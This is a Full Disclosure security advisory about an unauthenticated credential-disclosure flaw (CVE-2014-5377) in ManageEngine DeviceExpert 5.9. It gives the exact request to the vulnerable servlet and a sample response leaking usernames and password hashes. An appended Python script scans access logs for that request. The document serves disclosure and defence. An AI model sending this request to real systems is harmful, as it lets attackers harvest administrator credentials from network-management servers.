On 27 Aug 2014 19:14, "Pedro Ribeiro" <[email protected]> wrote:
>
> Hi,
>
> You can read the usernames and MD5 hashed passwords of all the users
> in the Device Expert application by sending an unauthenticated
> request.
> I am releasing this as a 0 day as ManageEngine have responded that
> they do not consider this a priority and won't fix it in the near
> future unless a customer requests it. See details below.
>
>
> >> User credential disclosure in ManageEngine DeviceExpert 5.9
> >> Discovered by Pedro Ribeiro ([email protected]), Agile Information Security
> ==========================================================================
>
>
> >> Background on the affected product:
> "DeviceExpert is a web-based, multi vendor network change,
> configuration and compliance management (NCCCM) solution for switches,
> routers, firewalls and other network devices. Trusted by thousands of
> network administrators around the world, DeviceExpert helps automate
> and take total control of the entire life cycle of device
> configuration management."
>
>
> >> Technical details:
> Vulnerability: User credential disclosure / CVE-2014-5377
> Constraints: no authentication or any other information needed.
> Affected versions: UNFIXED as of 27/08/2014 - current version 5.9
> build 5980 is vulnerable, older versions likely vulnerable
>
> GET /ReadUsersFromMasterServlet
>
> Example response:
> <?xml version="1.0" encoding="UTF-8"?><discoveryresult><discoverydata><username>admin</username><userrole>Administrator</userrole><password>Ok6/FqR5WtJY5UCLrnvjQQ==</password><emailid>[email protected]</emailid><saltvalue>12345678</saltvalue></discoverydata></discoveryresult>
>
> The passwords are a salted MD5 hash.
>
> A copy of this advisory is available at my repo:
> https://raw.githubusercontent.com/pedrib/PoC/master/me_deviceexpert-5.txt
>
> Regards,
> Pedro
To clarify, older versions are definitely vulnerable; I just don't know in which version the vulnerability initially appeared.

_______________________________________________
Sent through the Full Disclosure mailing list
http://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/
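Since the vendor had not shipped a fix at the time of the advisory, the practical question for an operator is whether the `/ReadUsersFromMasterServlet` endpoint has already been hit and from where. The following is an added example, not code from the advisory or from ManageEngine: it scans web-server access-log lines in Common Log Format for requests to that servlet, grades each by whether the server answered 200 (the user list was most likely returned) and whether the client address falls outside assumed RFC 1918 ranges, and separately counts how many account records a captured response carries so a finding can be confirmed without copying hashes into a ticket. The log lines and the second XML sample in the test are constructed; the log format, the internal ranges and the severity labels are assumptions to adapt to the real deployment.

```python
import re
from dataclasses import dataclass
from ipaddress import ip_address, ip_network
import xml.etree.ElementTree as ET

# Constructed sample access-log lines in Common Log Format (not taken from the advisory).
SAMPLE_LOG = """\
10.0.0.5 - - [27/Aug/2014:19:14:02 +0100] "GET /ReadUsersFromMasterServlet HTTP/1.1" 200 412
203.0.113.7 - - [27/Aug/2014:19:15:10 +0100] "GET /ReadUsersFromMasterServlet HTTP/1.1" 200 398
203.0.113.7 - - [27/Aug/2014:19:15:11 +0100] "GET /login.do HTTP/1.1" 200 1502
198.51.100.9 - - [27/Aug/2014:19:16:44 +0100] "GET /readusersfrommasterservlet?x=1 HTTP/1.1" 200 410
10.0.0.8 - - [27/Aug/2014:19:17:00 +0100] "POST /ReadUsersFromMasterServlet HTTP/1.1" 403 0
"""

# Common Log Format: client ident user [timestamp] "METHOD path PROTO" status size
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\d+|-)$'
)

# The endpoint named in the advisory; compared case-insensitively and without
# the query string so a variant spelling still raises an alert.
SENSITIVE_PATH = "/readusersfrommasterservlet"

# Assumed "internal" ranges (RFC 1918); replace with the real address plan.
INTERNAL_NETS = tuple(ip_network(n) for n in ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16"))


@dataclass
class Hit:
    ip: str
    ts: str
    method: str
    status: int
    size: int
    external: bool   # client address outside INTERNAL_NETS
    disclosed: bool  # server answered 200, i.e. the user list was most likely returned


def is_external(ip: str) -> bool:
    """True when the client address is not in any assumed internal range."""
    try:
        addr = ip_address(ip)
    except ValueError:
        return True  # unparsable address: treat as untrusted
    return not any(addr in net for net in INTERNAL_NETS)


def scan_access_log(text: str) -> list:
    """Return one Hit per request to the credential-disclosure servlet."""
    hits = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # not CLF, or a truncated line: skip rather than guess
        path = m.group("path").split("?", 1)[0].lower()
        if path != SENSITIVE_PATH:
            continue
        status = int(m.group("status"))
        size = 0 if m.group("size") == "-" else int(m.group("size"))
        hits.append(Hit(
            ip=m.group("ip"), ts=m.group("ts"), method=m.group("method"),
            status=status, size=size, external=is_external(m.group("ip")),
            disclosed=(status == 200),
        ))
    return hits


def count_exposed_accounts(xml_text: str) -> int:
    """Count <discoverydata> records in a captured response that carry a <password>.

    Gives the operator a number of affected accounts to report without
    reproducing the hash values themselves in any output.
    """
    root = ET.fromstring(xml_text)
    return sum(1 for rec in root.iter("discoverydata") if rec.find("password") is not None)


if __name__ == "__main__":
    for h in scan_access_log(SAMPLE_LOG):
        sev = "HIGH" if h.disclosed and h.external else "MEDIUM" if h.disclosed else "LOW"
        print(f"{sev:6} {h.ts} {h.ip} {h.method} status={h.status} bytes={h.size}")
```

Run against the constructed log, the scan reports three successful retrievals (two from non-internal addresses) and one blocked POST; a real deployment would feed it the Tomcat or reverse-proxy access log for the DeviceExpert host and treat any 200 to this path before a vendor fix as a credential-reset trigger for every account it lists.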
